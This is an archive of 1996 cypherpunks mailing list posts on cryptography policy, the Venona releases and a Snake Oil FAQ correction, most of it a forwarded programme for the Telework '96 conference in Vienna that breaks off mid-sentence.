Message-ID: <v03007804ae75ba6cd0ee@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: rah@tiac.net
Mime-Version: 1.0
Date: Mon, 30 Sep 1996 11:27:15 -0400
To: cypherpunks@toad.com
From: Robert Hettinga <rah@shipwright.com>
Subject: Diffie Speaks at Sun: "Cryptology, Technology, and Politics"
                          ^^^ MIT, of course...

Sorry!

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 1 Oct 1996 02:30:28 +0800
To: cypherpunks@toad.com
Subject: Re: GCHQ releases Venona files (from UK Telegraph)
Message-ID: <199609301407.OAA11575@pipe2.ny1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


If anyone in the UK cares to get the GCHQ Venona releases, we'll be pleased
to  
scan them for distribution. Or put them on our Web site. 
 
 
Our fax:  212-799-4003 (US) 
 
 
Vox: 212-873-8700 
 
 
Or if someone else scans them and needs a Web site, ftp them to: 
 
 
     ftp://jya.com/pub/incoming 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Tue, 1 Oct 1996 08:32:34 +0800
Subject: Another briefing in Atlanta on the NRC crypto report,... (fwd)
Message-ID: <199609302131.OAA02867@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


CRYPTO typed:
>From crypto@nas.edu  Mon Sep 30 07:32:49 1996
Date: Mon, 30 Sep 96 10:26:00 EST
From: "CRYPTO" <crypto@nas.edu>
Encoding: 27 Text
Message-Id: <9608308441.AA844104704@nas.edu>
To: crypto@nas.edu
Subject: Another briefing in Atlanta on the NRC crypto report,...

Subject:
Another briefing in Atlanta on the NRC crypto report, October 21, 1996
  Cryptography's Role in Securing
  the Information Society
  
  
  A Public Briefing in Atlanta, Georgia
  Monday, October 21, 1996, 1:30-3:30 pm
  
There will be a public briefing in Atlanta, Georgia by the National
Research Council on this report.  The briefing will be held at the
Manufacturing Research Center on the campus of the Georgia Institute of
Technology on Monday October 21, from 1:30 to 3:30.   Dr. Herbert Lin,
director of the NRC study will conduct the briefing.  Questions from the
audience will be entertained. For further information, please contact Dr.
Myron L. Cramer (404) 894-7292, <myron.cramer@gtri.gatech.edu> at the
Georgia Tech Research Institute.

The event is open to the press and the public.

Directions: From I-75/85 exit on Tenth Street and head West.  Turn left on
Hemphill Street and follow it to where it ends on Ferst Street.  The
Manufacturing Research Center is the modern building in front of you.
Parking is limited; use public transportation or allow yourself extra time.

     If you have suggestions about other places that the committee should
     offer a public briefing, please send e-mail to crypto@nas.edu.




--
<HTML><A HREF="http://www.eff.org/~mech">     Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org">          Electronic Frontier Foundation
</A><P>      Program Director    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Tue, 1 Oct 1996 07:44:45 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: active practice in America
Message-ID: <199609301839.LAA05232@dfw-ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:45 AM 9/30/96 -0800, you wrote:
>At 11:32 PM -0700 9/29/96, Dale Thorn wrote:

>
>(Legal purists will point out that the second trial was for "Federal civil
>rights violations." Harummphh. What would the Founders think of this logic:

I am sure you know the reason for the 'civil rights violation laws.

In the 50's & early 60's, all while jury's in the deep south refusing to
convict obviously guilty white defendants of rape and  murder against blacks.

What would be *your* remedy in such cases.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp2.anu.edu.au>
Date: Mon, 30 Sep 1996 15:03:27 +0800
To: cypherpunks@toad.com
Subject: GCHQ releases Venona files (from UK Telegraph)
Message-ID: <199609300451.VAA05353@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

A couple of articles from the UK Daily Telegraph may be of interest.

The earlier one "Codebreakers come clean" is about the upcoming
congference on cold war intelligence & mentions the continued
release of the NSA's Venona files 
(see http://www.nsa.gov:8080/docs/venona/venona.html)
The article is at:
http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//96/9/29/wspy29.html

The second is about the GCHQ (UK equivalent of NSA) releasing its
own Venona files in response to the NSA release.
http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//96/9/30/ngch30.html
These are being released into the public records office, but there is
no indication that they will appear on the net for the time being.

Sherry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rjasonc@pobox.com (rjasonc)
Date: Tue, 1 Oct 1996 08:14:27 +0800
To: cypherpunks@toad.com
Subject: Minor wording error in Snake Oil FAQ
Message-ID: <v02130502ae75d69b6fa4@[206.214.117.50]>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Mon, 30 Sep 96 11:05 EST
>From: "Robert S. Powers" <@mcimail.com>
>To: rjasonc <rjasonc@pobox.com>
>Subject: Wording error in your email
>
>Minor wording error. Your paragraph:
>
>  random session  This is a temporary key that is generated specifically for
>  key             one message. Typically, in public key cryptosystems, the
>                  message to be sent is encrypted with a symmetric key that
>                  was specifically generated for that message. The encrypted
>                  version of that message, as well as the associated session
Wording error here                               >               <
>                  key can then be encrypted with the recipient's public key.
>                  When the recipient decrypts the message, then, the system
>                  will actually decrypt the message it gets (which is the
>                  ciphertext message and the symmetric key to decrypt it),
>                  and then use the symmetric key to decrypt the ciphertext.
>                  The result is the plaintext message. This is often done
>                  because of the tremendous difference in the speed of
>                  symmetric vs. asymmetric ciphers.
>
>
>...says that BOTH the message and the secret key are encrypted
>using the public key system. I'm sure it's just a wording error;
>but clearly the public key system is NOT generally used to encrypt
>the full message. That would take too long, as you point out;
>and that's why the secret key is used at all!
>
>bp






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 1 Oct 1996 08:05:04 +0800
To: trei@process.com
Subject: Re: More proposals for European censorship
Message-ID: <01IA3E9U6S948Y57AQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"trei@process.com" 24-SEP-1996 07:54:10.53

>Or are you suggesting that this particular gang of sub-humans was
>exposed at this time in an attempt to influence policy, implying that
>the Belgian LEAs knew about, but did not stop the ring until they
>needed a publicity coup?

	How about "The LEAs put more effort into solving cases which can
get a political benefit than ones that don't"? Given limited police
resources (fortunately), they've got to prioritize somehow... and given
politically-appointed higher-ups, some form of concentration on
helpful-publicity cases is inevitable.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 1 Oct 1996 09:50:52 +0800
To: cypherpunks@toad.com
Subject: 3rd European Assembly on Telework and New Ways of Working
Message-ID: <01IA3EDBZEQA8Y57AQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu" 25-SEP-1996 00:10:23.83
From: Phil Agre <pagre@weber.ucsd.edu>
X-URL: http://communication.ucsd.edu/pagre/rre.html
X-Mailing-List: <rre@weber.ucsd.edu> archive/latest/1317

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Tue, 24 Sep 1996 08:31:26 +0200
From: brennert@sun1.alpin.or.at (Barbara Rennert-Buchegger)

[...]

Preliminary Programme

Telework '96
3rd European Assembly on Telework and New Ways of Working
WORKING IN A WIDER EUROPE

November 4 - 6, 1996, City Hall, Vienna, Austria

organized by
European Community Telework Forum (ECTF)
in association with
European Commission
City of Vienna
Federal Ministry of Science, Transports and the Arts
Chamber of Labour of Vienna
European Trade Unions Confederation
Austrian Trade Unions Confederation

---------------------------------------------------------------

Patronage
Thomas KLESTIL - President of the Federal Republic of Austria

Honorary Presidency
Martin Bangemann - European Commission, Commissioner of DG XIII (Belgium)
Rudolf SCHOLTEN - Federal Minister of Science, Transport and the Arts
(Austria)
Michael HAeUPL - Mayor of the City of Vienna (Austria)
Hannes SWOBODA - Councillor for Urban Planning and Foreign Affairs (Austria)

Assembly Co-ordinator
Josef HOCHGERNER - Centre for Social Innovation, ECTF (Austria)

Programme Chair
Enrique de la SERNA - INNOVA Intl., ECTF (Italy)
Christine GAUTHIER - CATRAL (France)
Franz NAHRADA - Globally Integrated Village Environment, CSI (Austria)

Assembly Steering Committee
Katarina ALMQUIST - NUTEK/Assembly Co-ordinator 1997 (Sweden)
Eduardo BARRERA CORTEZ - INMARK, ECTF (Spain)
Karl BONOMEO - TeleVillage Bruck an der Leitung (Austria)
Bruno BUCHBERGER - Softwarepark Hagenberg (Austria)
Renate CZESKLEBA - Austrian Trade Union Confederation (Austria)
Philippe DORIN - CATRAL (France)
Charles GRANTHAM - ISDW & CSI (USA)
Noel HODSON - SW 2000, ECTF (United Kingdom)
Arnold KLOTZ - Planning Director of the City of Vienna (Austria)
Brigitta MLINEK - Chamber of Labour of Vienna (Austria)
Jack NILLES - JALA, ECTF (USA)
Walter PAAVONEN - ECTF (Sweden)
Andrew PAGE - ECTF (United Kingdom)
Ingolf SCHAeDLER - Federal Ministry of Science, Transport and the Arts
(Austria)
Alain VEYRET - IDATE, ECTF (France)

European Commission
Peter JOHNSTON - DG XIII
Maarten BOTTERMAN - DG XIII

European Trade Unions Confederation (ETUC)
Emilio GABAGLIO

---------------------------------------------------------------

Organization

European Community Telework Forum

ECTF Austria Secretariat
Center for Social Innovation CSI
Hettenkofergasse 13
A-1160 Wien
Tel. +43-1-495 04 42-41
Fax +43-1-495 04 42-40
eMail j.hochgerner@magnet.at

ECTF International Secretariat
Santa Cruz de Mercenado, 33
E-28015 Madrid
Tel. +34-1-541 72 64
Fax +34-1-559 92 74
eMail eb.ectf@mad.servicom.es

Conference Secretariat
bco - j. breit congress organisation GmbH
Lenaugasse 11/36
A-1080 Wien
Tel. +43-1-403 28 20
Fax +43-1-406 77 52
eMail bco.breit@magnet.at

ATTENTION: As of Monday, November 4, 1996, the conference secretariat will be
located at the congress venue (City Hall).

Hotel reservation and travel arrangements
Austropa - Interconvention
P.O.Box 30
A-1043 Wien
Tel. +43-1-589 25-114
Fax +43-1-586 71 27
eMail austropa@oevb.co.at

Telework '96 on the Web
http://www.bco.co.at/bco/tw96/

The ECTF-HomePage on the Web
http://www.agora.stm.it/ectf/ectfhome.html

---------------------------------------------------------------

Preface

Rudolf ScholtenFederal Minister of Science, Transport and the Arts

The diffusion of telework is among the central phenomena characterizing the
contemporary technical and economic developments at a global state.
Faced with the restructuring of labour-markets and work, and witnessing the
rapidity of innovation within the information society it is the task of the
responsible analyst to consider the social impact of telework detached from
either technological euphoria  or resigned cultural pessimism.
In parallel to the growth of a worldwide net and the trends toward the
liberalisation of the telecom-markets the promotion of telework provides us
with seductive visions: Among others there is the promise to harmonize
classical antagonisms like those between urban and the rural areas or between
work and leisure-time. Accordingly teleworkers may expect a sheltered life in
the idyl of the village environment or the fond of the family whilst being
mobile beyond national borders at the same time. There is the assumption that
women in particular will no longer be threatened by breaks of their
professional careers. Companies are expected to increase profits due to
increased productivity and organisational innovation. Positive effects on the
labour-market and the natural environment are likewise foreseen.
No doubt telework bears chances for the future. Nevertheless, we should not
forget to take possible disadvantages  into account: For example, the
mingling of work and private sphere, relevant for mere homebased work, can be
a factor of increased individual mental stress. The creation of new patterns
of work might be connected with the loss of old types of jobs. Tendencies
toward individualisation and the decline of social solidarity might be
intensified. Issues like labour legislation and the threatening decrease of
social security urgently need to be discussed.
If we were to describe the situation as an open game of chances and risks, a
demand for creative policies to shape our future prospects positively and
consciously gains evidence.
This demand shall be met by "Telework 96": The exchange of experiences
between science and policy-makers, industry and trade unions is organized not
only in order to analyse the present situation, but also with a view of
preparing solutions for the near future.
"Working in a Wider Europe" may be read in a twofold way: as referring to an
extension of individual life perspectives as well as a metaphor for the
promotion of the process of the European integration, whereby the countries
of Central and Eastern Europe (CEE) will be of particular interest.
The use of advanced technology and traditional ways of decision-making can
not be mentioned without referring to mechanisms of exclusion. In contrast,
within and around "Telework 96" a wide range of events are organized for
adressing various types of institutions and groups of special interest,
including pupils, female workers, and persons in search of employment.

Rudolf Scholten

---------------------------------------------------------------

About the Assembly

Focus: European integration, particularly Central and Eastern Europe;
transnational standards for telework
Main topics: Getting people to work; Training for life in the Information
Society; Working towards sustainability
Format: Scientific conference & political assembly & exhibition of
applications and cases
Participants: Leading international experts, practitioners, scientists,
politicians, representatives from business, trade unions and public
administration and NGO's

Telework 96 provides the largest and most comprehensive platform to both
observe and promote progress of teleworking in Europe. It is the lead event
of the European Telework Week 1996 (ETW 96), which is held under the auspices
of the European Commission (DG XIII) from November 4-11, 1996. It is called
an "assembly" because of its composition comprising elements of a scientific
conference with political debates and of a business exhibition as well.

Companies, regional councils, telework pilots (e.g. tele-cottages) and other
institutions are invited to participate in an exhibition which is open to the
public. Conference meetings in plenaries and parallel sessions are open to
experts and representatives of basicly five major societal players in the
field:

(1) Employers (companies, associations of industrialists, Chambers of
Commerce)

(2) Employees (Trade Unions, Shop Stewards, Chambers of Labour, associations
of teleworkers)

(3) Politics (from communal, regional, national to European and transnational
level, particularly the Inter-Parliamentary Special Interest Group)

(4) Science (experts and analysts of many kinds, consultants and researchers
from private and public research centres, universities and international
institutions)

(5) NGO's (e.g. environmentalist groupings, women's organisations, youth
groups).
Public administration on municipal, regional, federal or European level of
course also plays a role which may e.g. in one case appear in the area of
politics or in another in that of the employers.

In the overall format speakers of the assembly are selected and invited
representatives of these groups. Participants of course will represent an
even wider spectrum and will have in many regards concurrent and additional
knowledge and experience in the themes the assembly deals with. Hence methods
and procedures will be imposed to prevent the assembly from becoming a sort
of closed shop where experts, known to each other quite well, tell experts
what is the experts expertise.

Instruments in this regard are:

+       Careful selection of speakers in the opening event (Monday evening), the
plenaries and the parallel track sessions both on Tuesday and Wednesday.

+       Offering an "Open Forum (OF)" concerning the three main topics (track 1:
Work, track 2: Training; track 3: Sustainability). This allows interested
observers and participants  to send in abstracts and posters about their work
(be it in research, teleworking pilots, publishing etc.). These contributions
will be taken care of by the scientific organizers in the following way:
        Besides the abstracts of the invited lectures contributions to the
OF will
be listed in the Preceedings; in each of the track sessions a discussion will
be held on how to best publish and further proceed with these pools of
knowledge; the "posters" will be exhibited, and the abstracts of written
contributions will be distributed during the assembly; publication will be
offered on the web (Telework 96 homepage) and a selection of the most
relevant contributions will be printed after the event as "Proceedings 2"
apart from the lectures of invited speakers ("Proceedings 1").

+       The invention of a "Worker's Tele-Corner": A dedicated workplace in the
conference area is connected to a server, bearing all the information brought
in through the OF, allowing interested people from around the globe to share
information on their teleworking experiences, needs and maybe marketable
results. Further to that there will be links not only to the Telework 96 and
ECTF homepages, but also to the ETW website http://www.eto.org.uk (e-mail:
etw96-info@eto.org.uk), ACTS and Telematics projects networks, and various
databanks (building up an "electronic environment" of Telework 96).

+       Teleconferencing between the major events within the assembly and other
European conferences operated within the European Telework Week.

+       Arranging "additional events" in Vienna, stimulated by Telework 96 and
being also integrated in the framework of the European Telework Week.

+       Allowing manyfold concertation meetings among telework oriented European
research and development projects.


Josef Hochgerner, Assembly Co-ordinator Vienna, June 1996

---------------------------------------------------------------

General Information

Conference fee
until September 30, 1996:
Participants ATS 6.300,-- / 480,-- ECU
Students ATS 2.000,-- / 155,-- ECU(Confirmation of the university has to be
enclosed)
Day Tickets     ATS 4.000,-- / 310,-- ECU

after September 30, 1996:
Participants ATS 7.200,-- / 550,-- ECU
Students ATS 2.400,-- / 185,-- ECU
(Confirmation of the university has to be enclosed)
Day Tickets ATS 4.000,-- / 310,-- ECU

Reduced fees (e.g. for members of non profit organizations or participants
from Central and Eastern Europe) are available on request.Press
representatives: Please contact the conference secretariat to receive an
accreditation.

Fee includes
Participation in all lectures and sessions, two lunches, coffee breaks,
cocktail reception, programme, abstract book and proceedings.

Evening reception
Upon invitation by the Mayor of Vienna.

Payment
The fee is payable in international money order to:
ECTF Austria - "Telework 96"
Account Nr. 784 070 377
Bank Code 20151
Bank Austria, Box 35, A-1011 Vienna
without charges for the beneficiary
or enclose a cheque to your registration (ATS 2.500,-- maximum per cheque).
Confirmation of registration only after receipt of payment!
If you pay the fee per bank transfer after October 1, 1996 and do not
receive
a confirmation of registration, please bring a copy of the money transfer
with you.

Cancellations
Cancellations made prior to October 1, 1996 will be charged 50% of the
assembly fee (only written cancellations can be accepted). We regret that
after this date no cancellations can be accepted.

Exhibition
In the course of the assembly an exhibition presents the most advanced
technologies and services to support individuals and organi-zations who are
already or wish to start teleworking. It will be open to the assembly
audience as well as to the public.
The exhibition will take place in the City Hall around the conference rooms.
Information about participation is available at the conference secretariat.

Poster Presentations and Contributions to the "Open Forum"
Poster presentations and abstracts to the "Open Forum" will be accepted until
September 30, 1996. Please use the abstract form for sending your submission.
Poster size: Max. 90 cm width, 140 cm height. Only participants of the
conference can present a poster. Poster presentation does not result into any
reduction of the conference fee.

Venue
The Vienna City Hall ("Rathaus") is located in the heart of the city close to
the "Ring". It can be reached by underground (U2, station "Rathaus") and tram
(D, 1, 2, station "Rathausplatz, Burgtheater").

Languages
Plenary sessions will be interpreted from and into German, English and
French, the parallel sessions will be held in English.

Badges
Please note that the badges will be needed for access to all scientific and
included social events of the conference.

Parking
In the area around the City Hall parking is only allowed for max. 90 minutes
with a special ticket. It is recommended to park cars in one of the garages
close to the congress venue.

Airport
The Vienna International Airport is located about 16 km from the city centre.
>From the airport the city can be reached
- by the airport bus (ATS 70,-- per person) to "City Air Terminal" at the
Hotel Hilton
- by Railway / "Schnellbahn" (ATS 34,-- per person) to the station "Wien
Mitte"
- by cab (ATS 400,-- - 600,-- per cab)

Climate
In November the weather in Vienna is cool, but usually not unpleasant. It is
recommended to take warm clothes with you.

---------------------------------------------------------------

Programme Monday, November 4, 1996

08.00 Registration
09.00 - 17.00 Concertation meetings of European projects on teleworking:

 1) ACTS-Concertation Meeting of the GA Telework Chain, involving
particularly DIPLOMAT (ACTS 10095, "The European Charter for Telework") and
ETD (ACTS 10081, "European Telework Development"). Partners/representatives
of other ACTS projects related to telework are invited to participate.

 2) Telematics programme, particularly telework oriented TURA-projects
("Telematics for Urban and Rural Areas") will be invited to participate in a
"trans-programme" communication to exchange experiences and further
exploitation of results across the programmes.

 3) Established contacts to DG V and the European Foundation for the
Improvement of Living and Working Conditions will lead to their presence in
this meeting too; transfer of knowledge is enhanced among the DG's involved
and projects started within the Community Initiatives (ADAPT, EMPLOYMENT).
Particularly the High Level Expert Group of DG V ("Flynn Commission") is
invited to participate.

Meeting rooms and communication facilities are available to be arranged
according to demand. The City of Vienna offers technical assistance to this
meeting as well as regarding "Telework 96", because the municipality of
Vienna itself participates in several European projects and took on the
"Bangemann Challenge". Thus the informatics department will use the Telework
Assembly  as a demonstrator of its ability of networking and building an
electronic environment for the conference. This will apply also to some of
the additional events which will take place during the ETW, and secure
permanence of information and communication technologies implementation
(teleworking facilities) set up to enhance the success of Telework 96 and
further achievements of the European Telework Week.

18.30 Welcome Cocktail
Welcome Address: Andrew PAGE - President of the ECTF (United Kingdom)

19.30 Evening Opening Event
"Tele-Future Without Work?"
Rudolf SCHOLTEN - Federal Minister of Science, Transport and the Arts
(Austria)
Michael HAeUPL - Mayor of the City of Vienna (Austria) (R)
Andrew MILLER - Member of the British Parliament (United Kingdom)
Upon invitation by Telework 96 and the City of Vienna prominent speakers will
present their view on the conference topics from various points.

---------------------------------------------------------------

Programme Tuesday, November 5, 1996

PLENARY SESSION "European Dimensions of Teleworking"

Moderation: Josef Broukal - ORF / Austrian Broadcasting Corporation (Austria)

09.00 - 09.20 Hannes SWOBODA - Councillor f. Urban Planning and Foreign
Affairs (Austria)
Cities and the new division of labour in Europe

09.20 - 09.40 Robert VERRUE - Europ. Commission, Director General of DG XIII
(Belgium)
European policies on telework

09.40 - 10.00 Discussion period

10.00 - 10.30 Etele BARATH - Member of the Hungarian Parliament (Hungary)
Building the European Information Society - the Hungarian perspective

10.30 - 11.00 Shalini VENTURELLI - American University, Washington D.C. (USA)
The policy design of the global Information Society Economic, political and
cultural dimensions

11.00 - 11.20 Coffee Break

11.20 - 12.00 Keynote Address by
Wouter VAN DIEREN - Institute for Environment and System Analysis
(Netherlands)

12.00 - 12.30 Discussion period

12.30 - 14.00 Lunch Break
Lunch will be served in the City Hall close to the conference rooms

14.00 - 18.00 TRACKS 1 - 3 (see following pages)


19.30 Evening reception upon invitation by the Mayor of Vienna
Videoconference with representatives of Prague and Budapest and corresponding
events within the European Telework Week.
Cocktail reception: Specialities from Austria, Hungary and the Czech Republic

---------------------------------------------------------------

TRACK 1

GETTING PEOPLE TO WORK

Tuesday, November 5, 1996  14.00 - 17.30
Wednesday, November 6, 1996 09.00 - 10.45

Restructuring national as well as international labour markets and
unemployment will remain top political issues of the next years.
Telework '96 will highlight the impact of telework and its legal aspects
within new organisational frames of companies, strategic alliances, civic
cooperation (NGO's) and private-public partnership. Transnational teleworking
may weaken national power. Thus cultural borders and new balances will also
appear in the scope of the conference.

Co-ordinators:
Renate CZESKLEBA - Austrian Trade Unions Confederation (Austria)
Andrew MILLER - Interparliamentary Special Interest Group (United Kingdom)

Preliminary List of Presentations and Contributions

Eduardo BARRERA CORTEZ - INMARK, ECTF (Spain)
Towards a European  employment agency for teleworkers

Willy BUSCHAK - European Trade Unions Confederation (Belgium)

Xavier DARMSTAEDTER - President of the Belgian TeleWorking Association,
Managing Director of Fischer & Lorenz Benelux (Belgium)
Can telework generate employment? - The role of Teleworking Associations

Ante JAMTLID - VINDUE (Sweden) / Nathalie FAY - ISDW (USA)
Creating job opportunities by telework development joint venture

Peter JOHNSTON - Europ. Commission, DG XIII, Head of Unit (Belgium)
A Vision for 2010

Georg KAPSCH - Kapsch AG (Austria)

Jens KITTELSEN - European Commission, DG V (Belgium)

Nicole TURBE-SUETENS - Syntaxia (France)
Telework and labour relations

Foundation for the Improvement of Living and Working Conditions (Ireland)

European RTD-projects on teleworking
(DIPLOMAT, ETD, DEMETER, MIRTI, TECODIS ...)


Open Forum - Discussion

---------------------------------------------------------------

TRACK 2

TRAINING FOR LIFE IN THE INFORMATION SOCIETY

Tuesday, November 5, 1996  14.00 - 17.30
Wednesday, November 6, 1996 09.00 - 10.45

New ways of teaching, learning, vocational training and continuous education
are indispensable prereqisites of socially and economically desirable modes
of teleworking.
Main topics within this session will be interactive distance learning,
knowledge bases and the use of intellectual capital. International links and
networks of "virtual colleges" will become enhanced by Telework '96.

Co-ordinators:
Ina WAGNER - University of Technology (Austria)
Noel HODSON - SW 2000 (United Kingdom)

Preliminary List of Presentations and Contributions

Brendan McCARTHY - Victoria University of Technology, Melbourne (Australia)
Learning experiment on teleworking with students

Andrew FRAYLING - Protocol Ltd. (United Kingdom)
IPR - Intellectual property rights and the issues facing the teleworker

Charles GRANTHAM - Institute for the Study of Distributed Work (USA)
Using new ways of work to create intellectual capital

Sigram SCHINDLER, Marc BUCHMANN - Teles GmbH Berlin (Germany)
ICARE 9000: A Teletraining Platform for SME's to gain the ISO 9000
Certification

Invited speaker of the University of Oxford (United Kingdom)
Interactive Distance Learning (IDLE) in Oxford

Johann GUeNTHER / Angelika VOLST - Donau University (Austria)
TELEMACHOS: Teleuniversity for telematics management

Commercial Training Centres

Open Forum - Discussion

---------------------------------------------------------------

TRACK 3

WORKING TOWARDS SUSTAINABILITY

Tuesday, November 5, 1996  14.00 - 17.30
Wednesday, November 6, 1996 09.00 - 10.45

Further implementation of tele-centres and urban telematics creates a new
notion of community, both in cities and rural areas. This entangles a series
of social issues and paradox interventions. A changing environment may evolve
in the wake of the distribution of innovative forms of communication and
transportation. Particularly regarding countries in CEE the eventual
availability of "shortcuts to sustainability" will be addressed.

Co-ordinators:
Franz NAHRADA - Globally Integrated Village Environment/CSI (Austria)
Katarina ALMQUIST - NUTEK (Sweden)


Preliminary List of Presentations and Contributions

Eric BRITTON - EcoPlan International (France)
Sustainability - from thought to action

Mats ENGSTROeM, Walter PAAVONEN - Nordplan (Sweden)
Sustainable principles for working organizations

Michael ERTEL (Germany)
Health and safety aspects of teleworking

Maria FISCHER-KOWALSKI - Institute for Interdisciplinary Research and
Continuing Education (Austria)
Societal Metabolism

Michel GIRAUD - Isle de France Neighbourhood Offices Network (France)
Distance working - An asset for sustainable development?

Reza KAZEMIAN - University of Stockholm (Sweden)
Telematics on the societal and spatial structures of cities and their
hinterlands
A Project for sustainable location design

Robert PESTEL - European Commission (Belgium)
Sustainability in the information society?

F.J. RADERMACHER - Forschungsinstitut fur anwendungsorientierte
Wissensverarbeitung (Germany)
Stable paths into a sustainable world

Open Forum - Discussion

---------------------------------------------------------------

Programme Wednesday, November 6, 1996

09.00 - 10.45 Continuation of Tracks 1 - 3

09.00 - 10.45 Parallel Meeting of the European Inter-Parliamentary Special
Interest Group

10.45 - 11.00 Coffee Break


PLENARY SESSION

Moderator: Marion FUGLIEWICZ - Communications Consultant (Austria)

11.00 - 12.00 Reports from Tracks 1 - 3 and the Inter-Parliamentary Special
Interest Group

12.00 - 12.30 Discussion period

12.30 - 14.00 Lunch
Lunch will be served in the City Hall close to the conference rooms

14.00 - 16.00 Round Table Discussion: Political Implications
Representative of the Austrian Government
Ines UUSMAN - Minister of Transport and Communication (Sweden)
European Ministers for Telecom, Work and Social Affairs
Representatives of Central and Eastern European Countries
Fritz VERZETNITSCH - President of the European Trade Unions Confederation
Senior Industrialists
European Parliament
High Level Expert Group of DG V
European Commission

Opera, Theater or Concert tickets for your last evening in Vienna
On request Austropa Interconvention provides opera, theater or concert
tickets. Programmes are available one month in advance. Tickets can be
confirmed the earliest 1 month prior to the performance. Prices depend on the
seat category and cast. Ticket prices for the Viennese State Opera range from
ATS 350, to ATS 2300,, for Musicals from ATS 310, to 1200,, for concerts and
other plays from ATS 300, to 850, plus 25% per ticket advance booking fee.
On November 6, 1996, tickets are available for:
Vienna State Opera - Stifelio by Giuseppe Verdi - Carreras, Zampieri, Bruson
Please note: Due to this special performance tickets will not be available at
regular rates (supplement of approx. 40-50%). We have to point out that for
this performance only a very small number of tickets will be available.
Volksoper: Land des Laechelns by Franz Lehar
Musicals: Theater an der Wien: Elisabeth (in German)
Raimund Theater: Beauty and the Beast (in German)

---------------------------------------------------------------

Additional Events

>From Wednesday, 6th of November, onwards a series of relevant  workshops,
discussions, professional assemblies and promotion activities about
teleworking will take place to address a broad local public .
These events will be organized by institutions (e.g. Trade Unions or the
Chamber of Commerce, schools), existing tele-centres and tele-houses or
companies, associations and NGO's, addressing pupils, female workers,
unemployed, and people who are looking for new jobs or alternatives to their
current working situation.

Preliminary List of additional events of Telework 96
Austrian Network of Women (Oesterreichisches Frauennetzwerk) - Workshop
"Women on the Data-Highway"
Trade Union of Service Industries (Gewerkschaft der Privatangestellten, GPA)
- p.r. activities for collective and in-company agreements on Teleworking
Telecentre Autokaderstrasse, Vienna - Open House
Telecentre of Kapsch AG, Vienna - Open House
Ericsson - Open House
Federal Ministry of Education/Educational Council of Vienna -
Essay Competition among pupils
Tele-House Ltd. of Lower Austria - Local Demonstrators
Telecentre Bruck - Planning Workshop
Telecentre Hermagor - Planning Workshop
Telecentre Pinkafeld - Planning Workshop

---------------------------------------------------------------

Accompanying Persons' Programme (Optional Tours)

Vouchers for optional tours will be handed over to the
participants/accompanying persons at the AUSTROPA INTERCONVENTION DESK.
AUSTROPA INTERCONVENTION reserves the right to cancel tours should the
minimum number of people not be reached.

Tuesday, November 5, 1996

City Tour: "Historic Vienna" including a visit to the Schoenbrunn Palace
Departure from the Rathaus at 9 AM, duration approx. 3
This tour gives an overall view of the city and also leads to some prominent
sights. Driving along the Ringstrasse, a circular boulevard of 4 kilometers,
which was built during mid last century, one can see many impressive
buildings, such as the State Opera, the Burgtheater, various Museums, the
Parliament, the City Hall and the University. The highlight of the tour is
the visit to the Schoenbrunn Palace, the summer residence of the Austrian
Emperors.
Price per person, incl. bus tour, guide and entrance fee ATS 320,
Minimum of 25 people per bus

Excursion: "Kahlenberg - Klosterneuburg"
Departure from the Rathaus at 2PM, duration approx. 3 hours
On the way to the Danube the bus drives through the north eastern part of the
city offering a magnificent view of the hills surrounding Vienna, the so
called "Wienerwald". Via the scenic route and passing through some well-known
Heurigen villages, you reach the Kahlenberg. This lookout offers a good view
of the entire city. The bus tour continues to Klosterneuburg, the first
residence of the Babenberg family in the area of Vienna during the early
medieval times. The most prominent site to visit is the Abbey of the
Augustinian Friars, founded before 1108. The unique romanesque Verdun Altar
with its 51 enamelled tablets by Nikolaus von Werden, dated 1181, is the most
valuable piece of art in the abbey.
Price per person, incl. bus tour, guide and entrance fees ATS 290,
Minimum of 25 people per bus

Wednesday, November 6, 1996

Arts and Crafts in Vienna
Departure from the Rathaus at 9.30AM, duration approx. 2
The "Augarten" Porcelain Manufactory was established in Vienna as early as
1718. Many of the common designs still have their origin in the times of
Empress Maria Theresia who recognized the importance of creative
